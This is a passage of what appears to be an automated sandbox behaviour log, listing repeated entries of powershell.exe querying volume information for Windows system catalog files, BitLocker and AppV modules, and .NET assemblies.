Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
